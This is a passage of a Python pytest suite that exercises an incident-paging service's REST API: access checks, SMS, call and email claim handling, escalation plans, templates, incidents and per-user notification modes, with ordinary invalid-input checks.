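    '''Illustrative only: create an incident with one sms message and read it back'''
    incident_id = create_incident_with_message(
        sample_application_name, sample_plan_name, sample_user, 'sms')
    re = requests.get(base_url + 'incidents/%s' % incident_id)
    assert re.status_code == 200
    return incident_id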
def test_api_acls(sample_user, sample_user2):
re = requests.get(base_url + 'users/' + sample_user)
assert re.status_code == 401
assert re.json()['title'] == 'Username must be specified for this action'
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user2))
assert re.status_code == 401
assert re.json()['title'] == 'This user is not allowed to access this resource'
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
re = requests.get(base_url + 'users/' + sample_user2, headers=username_header(sample_user2))
assert re.status_code == 200
def test_api_bad_application():
re = requests.post(base_url + 'incidents', headers={'Authorization': 'hmac fakeapplication123234234:abc'})
assert re.status_code == 401
def test_api_response_phone_call(fake_message_id, fake_incident_id, sample_phone):
if not all([fake_message_id, fake_incident_id, sample_phone]):
pytest.skip('We do not have enough data in DB to do this test')
data = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'To': sample_phone,
'ToZip': 15108,
'FromState': 'CA',
'Digits': 2,
'From': '+16504222677'
}
re = requests.post(base_url + 'response/twilio/calls', params={
'message_id': fake_message_id,
}, data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
def test_api_response_batch_phone_call(fake_batch_id, sample_phone):
if not all([fake_batch_id, sample_phone]):
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'To': sample_phone,
'ToZip': 15108,
'FromState': 'CA',
'Digits': '2',
'From': '+16504222677',
}
re = requests.post(base_url + 'response/twilio/calls', params={
'message_id': fake_batch_id,
}, data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"All iris incidents claimed for batch id %s."}' % fake_batch_id
def test_api_response_sms(fake_message_id, fake_incident_id, sample_phone):
if not all([fake_message_id, fake_incident_id, sample_phone]):
pytest.skip('Failed finding a batch ID to use for tests')
base_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
}
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
data = base_body.copy()
data['Body'] = 'Claim %s claim arg1 arg2' % fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"Iris incident(%s) claimed."}' % fake_incident_id
data = base_body.copy()
data['Body'] = fake_message_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 400
assert re.json()['title'] == 'Invalid response'
def test_api_response_batch_sms(fake_batch_id):
if not fake_batch_id:
pytest.skip('Failed finding a batch ID to use for tests')
base_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': '+14123706122',
}
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % fake_batch_id
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 200
assert re.content == '{"app_response":"All iris incidents claimed for batch id %s."}' % fake_batch_id
data = base_body.copy()
data['Body'] = '%s claim arg1 arg2' % '*(fasdf'
re = requests.post(base_url + 'response/twilio/messages', data=data)
assert re.status_code == 400
def test_api_response_claim_all(sample_user, sample_phone, sample_application_name, sample_application_name2, sample_plan_name, sample_email):
if not all([sample_user, sample_phone, sample_application_name, sample_plan_name]):
pytest.skip('Not enough data for this test')
sms_claim_all_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
'Body': 'claim all'
}
email_claim_all_payload = {
'body': 'claim all',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
# Clear out any existing unclaimed incidents, so they don't interfere with these tests
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
# Shouldn't be any incidents. Verify response in this case.
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert re.json()['app_response'] == 'No incidents to claim'
# Verify SMS with two incidents from the same app
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert re.json()['app_response'] in ('Iris Incidents claimed (2): %s, %s' % (incident_id_1, incident_id_2),
'Iris Incidents claimed (2): %s, %s' % (incident_id_2, incident_id_1))
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email with two incidents from the same app
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/gmail', json=email_claim_all_payload)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify SMS with two incidents from different apps
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name2, sample_plan_name, sample_user, 'sms')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
# Response will be two lines, one for each application and its claimed incidents
re = requests.post(base_url + 'response/twilio/messages', data=sms_claim_all_body)
assert re.status_code == 200
assert set(re.json()['app_response'].splitlines()) == {'%s: Iris Incidents claimed (1): %s' % (sample_application_name, incident_id_1),
'%s: Iris Incidents claimed (1): %s' % (sample_application_name2, incident_id_2)}
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email with two incidents from different apps
incident_id_1 = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id_1
incident_id_2 = create_incident_with_message(sample_application_name2, sample_plan_name, sample_user, 'email')
assert incident_id_2
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 1
re = requests.post(base_url + 'response/gmail', json=email_claim_all_payload)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id_1)
assert re.status_code == 200
assert re.json()['active'] == 0
re = requests.get(base_url + 'incidents/%s' % incident_id_2)
assert re.status_code == 200
assert re.json()['active'] == 0
def test_api_response_claim_last(sample_user, sample_phone, sample_application_name, sample_plan_name, sample_email):
if not all([sample_user, sample_phone, sample_application_name, sample_plan_name]):
pytest.skip('Not enough data for this test')
# Verify SMS
incident_id = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'sms')
assert incident_id
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 1
sms_body = {
'AccountSid': 'AC18c416864ab02cdd51b8129a7cbaff1e',
'ToZip': 15108,
'FromState': 'CA',
'ApiVersion': '2010-04-01',
'From': sample_phone,
'Body': 'claim last'
}
re = requests.post(base_url + 'response/twilio/messages', data=sms_body)
assert re.status_code == 200
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 0
# Verify email
incident_id = create_incident_with_message(sample_application_name, sample_plan_name, sample_user, 'email')
assert incident_id
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 1
data = {
'body': 'claim last',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
re = requests.get(base_url + 'incidents/%s' % incident_id)
assert re.status_code == 200
assert re.json()['active'] == 0
def test_api_response_email(fake_message_id, sample_email):
if not all([fake_message_id, sample_email]):
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_message_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim %s' % fake_message_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'Re: %s Alert That Is Firing' % fake_message_id}
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
def test_api_response_invalid_email(fake_message_id):
if not fake_message_id:
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_message_id,
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 400
def test_api_response_gmail_one_click(fake_message_id, sample_email):
if not all([fake_message_id, sample_email]):
pytest.skip('Failed finding a batch ID to use for tests')
re = requests.post(base_url + 'response/gmail-oneclick', json={
'msg_id': fake_message_id,
'email_address': sample_email,
'cmd': 'claim'
})
assert re.status_code == 204
re = requests.post(base_url + 'response/gmail-oneclick', json={
'msg_id': 'fakemessageid',
'email_address': sample_email,
'cmd': 'claim'
})
assert re.status_code == 400
re = requests.post(base_url + 'response/gmail-oneclick', json={})
assert re.status_code == 400
def test_api_response_batch_email(fake_batch_id, sample_email):
if not fake_batch_id:
pytest.skip('Failed finding a batch ID to use for tests')
data = {
'body': '%s claim' % fake_batch_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': 'claim %s' % fake_batch_id,
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 204
data = {
'body': u'I\u0131d claim',
'headers': [
{'name': 'From', 'value': sample_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=data)
assert re.status_code == 400
def test_plan_routing():
re = requests.get(base_url + 'plans/TESTDOOOOT')
assert re.content == ""
assert re.status_code == 404
def test_post_plan(sample_user, sample_team, sample_template_name):
data = {
"creator": sample_user,
"name": sample_user + "-test-foo",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
{
"role": "oncall-primary",
"target": sample_team,
"priority": "high",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
],
[
{
"role": "oncall-primary",
"target": sample_team,
"priority": "urgent",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
{
"role": "team",
"target": sample_team,
"priority": "medium",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
]
],
"isValid": True
}
# sort list so it's easier to compare
data['steps'][0] = sorted(data['steps'][0], key=lambda x: x['priority'])
data['steps'][1] = sorted(data['steps'][1], key=lambda x: x['priority'])
data['steps'] = sorted(data['steps'], key=lambda x: x[0]['priority'] + x[1]['priority'])
# Test post to plans endpoint (create plan)
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
plan_id = re.content.strip()
new_data = requests.get(base_url + 'plans/' + str(plan_id)).json()
assert new_data['name'] == data['name']
assert new_data['creator'] == data['creator']
assert new_data['description'] == data['description']
assert len(new_data['steps']) == len(data['steps'])
new_data['steps'][0] = sorted(new_data['steps'][0], key=lambda x: x['priority'])
new_data['steps'][1] = sorted(new_data['steps'][1], key=lambda x: x['priority'])
new_data['steps'] = sorted(new_data['steps'], key=lambda x: x[0]['priority'] + x[1]['priority'])
for k in ('role', 'target', 'priority', 'wait', 'repeat', 'template'):
assert new_data['steps'][0][0][k] == data['steps'][0][0][k]
assert new_data['steps'][0][1][k] == data['steps'][0][1][k]
assert new_data['steps'][1][0][k] == data['steps'][1][0][k]
assert new_data['steps'][1][1][k] == data['steps'][1][1][k]
# Test post to plan endpoint (mark active/inactive)
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 0})
assert re.status_code == 200
assert re.content == '0'
# Malformed requests
re = requests.post(base_url + 'plans/' + plan_id, json={})
assert re.status_code == 400
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 'fakeint'})
assert re.status_code == 400
re = requests.get(base_url + 'plans?active=0&name__contains=%s-test-foo&creator__eq=%s' % (sample_user, sample_user))
assert re.status_code == 200
# >= 1 because no database cleanup after test
assert len(re.json()) >= 1
re = requests.post(base_url + 'plans/' + plan_id, json={'active': 1})
assert re.status_code == 200
assert re.content == '1'
# Test get plan endpoint (plan search)
re = requests.get(base_url + 'plans?active=1&name__contains=%s-test-foo' % sample_user)
assert re.status_code == 200
assert len(re.json()) == 1
# Test limit clause
re = requests.get(base_url + 'plans?active=0&limit=1')
assert re.status_code == 200
assert len(re.json()) == 1
# Test errors
bad_step = {"role": "foo",
"target": sample_team,
"priority": "medium",
"wait": 600,
"repeat": 0,
"template": sample_template_name}
# Test bad role
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Role not found for step 1'
# Test bad target
bad_step['role'] = 'user'
bad_step['target'] = 'nonexistentUser'
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Target nonexistentUser not found for step 1'
# Test bad priority
bad_step['target'] = sample_team
bad_step['priority'] = 'foo'
data['steps'][0][0] = bad_step
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json()['description'] == 'Priority not found for step 1'
def test_post_invalid_step_role(sample_user, sample_team, sample_template_name):
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [
[
{
'role': 'oncall-primary',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_template_name
},
],
],
'isValid': True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json() == {'description': 'Role oncall-primary is not appropriate for target %s in step 1' % sample_user, 'title': 'Invalid role'}
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [
[
{
'role': 'user',
'target': sample_team,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_template_name
},
],
],
'isValid': True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 400
assert re.json() == {'description': 'Role user is not appropriate for target %s in step 1' % sample_team, 'title': 'Invalid role'}
def test_post_incident(sample_user, sample_team, sample_application_name, sample_template_name):
data = {
"creator": sample_user,
"name": sample_user + "-test-incident-post",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
{
"role": "oncall-primary",
"target": sample_team,
"priority": "high",
"wait": 300,
"repeat": 1,
"template": sample_template_name
},
],
],
"isValid": True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
incident_id = int(re.content)
assert re.status_code == 201
re = requests.get(base_url + 'incidents/%s' % re.content.strip())
assert re.status_code == 200
re = requests.post(base_url + 'incidents/%d' % (incident_id, ), json={
'owner': sample_user,
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 200
assert re.json() == {'owner': sample_user, 'incident_id': incident_id, 'active': False}
def test_post_incident_change_application(sample_user, sample_application_name, sample_application_name2, superuser_application):
# superuser_application (iris-frontend) is allowed to create incidents as other apps, so this works
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': sample_application_name,
}, headers={'Authorization': 'hmac %s:abc' % superuser_application})
incident_id = int(re.content)
assert re.status_code == 201
re = requests.get(base_url + 'incidents/%s' % re.content.strip())
assert re.status_code == 200
assert re.json()['application'] == sample_application_name
re = requests.post(base_url + 'incidents/%d' % (incident_id, ), json={
'owner': sample_user,
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 200
assert re.json() == {'owner': sample_user, 'incident_id': incident_id, 'active': False}
    # sample_application_name2 is not allowed to create incidents as sample_application_name, so this will fail
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': sample_application_name2,
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 403
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
'application': 'fakeapp234234',
}, headers={'Authorization': 'hmac %s:abc' % superuser_application})
assert re.status_code == 400
def test_post_incident_without_apps(sample_user, sample_team, sample_template_name, sample_application_name2):
data = {
"creator": sample_user,
"name": sample_user + "-test-incident-post",
"description": "Test plan for e2e test",
"threshold_window": 900,
"threshold_count": 10,
"aggregation_window": 300,
"aggregation_reset": 300,
"steps": [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
],
],
"isValid": True
}
re = requests.post(base_url + 'plans', json=data)
assert re.status_code == 201
# The application in sample_application_name2 does not have any sample_template_name templates, so this
# will fail
re = requests.post(base_url + 'incidents', json={
'plan': sample_user + '-test-incident-post',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name2})
assert re.status_code == 400
def test_post_incident_invalid_plan_name(sample_application_name):
re = requests.post(base_url + 'incidents', json={
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 400
re = requests.post(base_url + 'incidents', json={
'plan': 'foo-123-xyz-adskhpb',
'context': {},
}, headers={'Authorization': 'hmac %s:abc' % sample_application_name})
assert re.status_code == 404
def test_create_invalid_template(sample_user, sample_application_name):
valid_template = {
"creator": sample_user,
"name": "test template",
"content": {
sample_application_name: {
"call": {"subject": "", "body": "{{nodes}}"},
"email": {"subject": "123", "body": "123"},
"im": {"subject": "", "body": "123"},
"sms": {"subject": "", "body": "123"}
}
}
}
invalid_template = valid_template.copy()
del invalid_template['creator']
re = requests.post(base_url + 'templates', json=invalid_template)
assert re.status_code == 400
assert re.json()['title'] == 'creator argument missing'
invalid_template = valid_template.copy()
del invalid_template['name']
re = requests.post(base_url + 'templates', json=invalid_template)
assert re.status_code == 400
assert re.json()['title'] == 'name argument missing'
def test_active_incidents():
re = requests.get(base_url + 'incidents?active=1')
assert re.status_code == 200
assert isinstance(re.json(), list)
def test_filter_incidents_by_creator(sample_user, sample_user2):
re = requests.get(base_url + 'incidents?target=%s&target=%s' % (sample_user, sample_user2))
assert re.status_code == 200
data = re.json()
assert isinstance(data, list)
re = requests.get(base_url + 'incidents?target=' + sample_user)
assert re.status_code == 200
data = re.json()
assert isinstance(data, list)
def test_api_get_nested_context(sample_user, sample_team, sample_template_name, sample_application_name):
re = requests.post(base_url + 'plans', json={
'name': 'test_nested_plan',
'description': 'foo',
'step_count': 0,
'threshold_window': 1,
'threshold_count': 1,
'aggregation_window': 1,
'aggregation_reset': 1,
'steps': [
[
{
"role": "team",
"target": sample_team,
"priority": "low",
"wait": 600,
"repeat": 0,
"template": sample_template_name
},
],
],
'creator': sample_user,
})
assert re.status_code == 201
ctx = {
"nodes": [
{
"device": "abc2-efg01.nw.example.com",
"type": "BFD",
"message": "bar",
"component": "NA"
},
],
}
re = requests.post(base_url + 'incidents', json={
'plan': 'test_nested_plan',
'context': ctx,
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 201
iid = re.content.strip()
re = requests.get(base_url + 'incidents/' + iid)
assert re.status_code == 200
assert re.json()['context']['nodes'] == ctx['nodes']
def test_large_incident_context(sample_user, sample_application_name):
re = requests.post(base_url + 'plans', json={
'name': 'test_nested_plan',
'description': 'foo',
'step_count': 0,
'threshold_window': 1,
'threshold_count': 1,
'aggregation_window': 1,
'aggregation_reset': 1,
'steps': [],
'creator': sample_user,
})
assert re.status_code == 201
ctx = {
"nodes": [
{
"device": "abc2-efg01.nw.example.com" * 10000,
"type": "BFD",
"message": "bar",
"component": "NA"
},
],
}
re = requests.post(base_url + 'incidents', json={
'plan': 'test_nested_plan',
'context': ctx,
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 400
assert re.json()['title'] == 'Context too long'
def test_get_user_modes(sample_user, sample_application_name):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert sorted(re.json()) == sorted(['high', 'urgent', 'medium', 'low'])
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert sorted(re.json()) == sorted(['high', 'urgent', 'medium', 'low'])
def test_get_messages(iris_messages):
if len(iris_messages) < 3:
pytest.skip('Skipping this test as we don\'t have enough message IDs')
re = requests.get(base_url + 'messages?id__in=' + ', '.join(str(m['id']) for m in iris_messages[:3])).json()
assert len(re) == 3
re = requests.get(base_url + 'messages?limit=1&id__in=' + ', '.join(str(m['id']) for m in iris_messages[:3])).json()
assert len(re) == 1
re = requests.get(base_url + 'messages?id__in=%s' % iris_messages[1]['id']).json()
assert len(re) == 1
assert re[0]['id'] == iris_messages[1]['id']
re = requests.get(base_url + 'messages/%s' % iris_messages[0]['id']).json()
assert re['id'] == iris_messages[0]['id']
def test_get_messages_not_found():
re = requests.get(base_url + 'messages/0')
assert re.status_code == 404
def test_get_incident(iris_incidents):
if len(iris_incidents) < 3:
pytest.skip('Skipping this test as we don\'t have enough incidents')
re = requests.get(base_url + 'incidents?id__in=' + ', '.join(str(m['id']) for m in iris_incidents[:3])).json()
assert len(re) == 3
re = requests.get(base_url + 'incidents?limit=1&fields=id&id__in=' + ', '.join(str(m['id']) for m in iris_incidents[:3])).json()
assert len(re) == 1
re = requests.get(base_url + 'incidents?id__in=%s' % iris_incidents[1]['id']).json()
assert len(re) == 1
assert re[0]['id'] == iris_incidents[1]['id']
re = requests.get(base_url + 'incidents/%s' % iris_incidents[0]['id']).json()
assert re['id'] == iris_incidents[0]['id']
re = requests.get(base_url + 'incidents/fakeid')
assert re.status_code == 400
re = requests.get(base_url + 'incidents/-1')
assert re.status_code == 404
def test_post_user_modes(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
change_to = {
'high': 'default',
'urgent': 'default',
'medium': 'im',
'low': 'call'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=change_to)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert re.json() == change_to
# Now test update/delete functionality
change_to['medium'] = 'call'
change_to['low'] = 'default'
re = session.post(base_url + 'users/modes/' + sample_user, json=change_to)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/' + sample_user)
assert re.status_code == 200
assert re.json() == change_to
def test_post_target_application_modes(sample_user, sample_application_name):
session = requests.Session()
session.headers = username_header(sample_user)
mode_data = {
'application': sample_application_name,
'high': 'default',
'urgent': 'default',
'medium': 'im',
'low': 'call'
}
modes = mode_data.copy()
del modes['application']
re = session.post(base_url + 'users/modes/' + sample_user,
json=mode_data)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert re.json() == modes
# Now test update/delete functionality
mode_data['medium'] = 'call'
mode_data['low'] = 'default'
modes = mode_data.copy()
del modes['application']
re = session.post(base_url + 'users/modes/' + sample_user, json=mode_data)
assert re.status_code == 200
re = session.get(base_url + 'users/modes/%s?application=%s' % (sample_user, sample_application_name))
assert re.status_code == 200
assert re.json() == modes
def test_post_target_multiple_application_modes(sample_user, sample_application_name, sample_application_name2):
session = requests.Session()
session.headers = username_header(sample_user)
# Set priorities for two apps in batch, as well as global defaults
modes_per_app = {
'per_app_modes': {
sample_application_name: {
'high': 'sms',
'urgent': 'call',
'medium': 'im',
'low': 'call'
},
sample_application_name2: {
'high': 'email',
'urgent': 'email',
'medium': 'im',
'low': 'call'
},
},
'high': 'call',
'urgent': 'call',
'medium': 'call',
'low': 'call'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=modes_per_app)
assert re.status_code == 200
re = session.get(base_url + 'users/' + sample_user)
assert re.status_code == 200
result = re.json()
assert modes_per_app['per_app_modes'] == result['per_app_modes']
assert all(result['modes'][key] == modes_per_app[key] for key in ['high', 'urgent', 'medium', 'low'])
# Now try deleting both custom apps by setting all to default
modes_per_app_delete = {
'per_app_modes': {
sample_application_name: {
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
},
sample_application_name2: {
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
},
},
'high': 'default',
'urgent': 'default',
'medium': 'default',
'low': 'default'
}
re = session.post(base_url + 'users/modes/' + sample_user, json=modes_per_app_delete)
assert re.status_code == 200
re = session.get(base_url + 'users/' + sample_user)
assert re.status_code == 200
result = re.json()
assert {} == result['per_app_modes'] == result['modes']
def test_create_template(sample_user, sample_application_name):
post_payload = {
'creator': sample_user,
'name': 'test_template',
'content': {
sample_application_name: {
'sms': {'subject': '', 'body': 'test_sms'},
'im': {'subject': '', 'body': 'test_im'},
'call': {'subject': '', 'body': 'test_call'},
'email': {'subject': 'email_subject', 'body': 'email_body'}
}
},
}
re = requests.post(base_url + 'templates/', json=post_payload)
assert re.status_code == 201
template_id = int(re.text)
re = requests.get(base_url + 'templates/%d' % template_id)
assert re.status_code == 200
data = re.json()
re = requests.get(base_url + 'templates/faketemplatethatdoesnotexist')
assert re.status_code == 404
for key in ['name', 'creator', 'content']:
assert post_payload[key] == data[key]
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 0})
assert re.status_code == 200
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 'sdfdsf'})
assert re.status_code == 400
re = requests.post(base_url + 'templates/%d' % template_id, json={})
assert re.status_code == 400
re = requests.get(base_url + 'templates?name=test_template&creator=%s&active=0' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) >= 1
re = requests.get(base_url + 'templates?limit=1&name=test_template&creator=%s&active=0' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) == 1
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 1})
assert re.status_code == 200
re = requests.get(base_url + 'templates?name=test_template&creator=%s&active=1' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) == 1
def test_get_targets(sample_user, sample_user2, sample_team, sample_team2):
re = requests.get(base_url + 'targets')
assert re.status_code == 200
assert sample_user in re.json()
re = requests.get(base_url + 'targets/team')
assert re.status_code == 200
assert sample_team in re.json()
re = requests.get(base_url + 'targets/team?startswith=' + sample_team[:3])
data = re.json()
assert re.status_code == 200
assert sample_team in data
assert sample_team2 not in data
re = requests.get(base_url + 'targets/user?startswith=' + sample_user[:3])
data = re.json()
assert re.status_code == 200
assert sample_user in data
assert sample_user2 not in data
@pytest.mark.skip(reason="Re-enable this test when we can programmatically create the noc user in the test")
def test_post_plan_noc(sample_user, sample_team, sample_application_name):
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [],
'isValid': True
}
invalid_steps = [
[
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'oncall-primary',
'target': sample_team,
'priority': 'high',
'wait': 300,
'repeat': 1,
'template': sample_application_name
},
]
],
[
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
},
]
],
]
valid_steps = [
[
[
{
'role': 'user',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
],
[
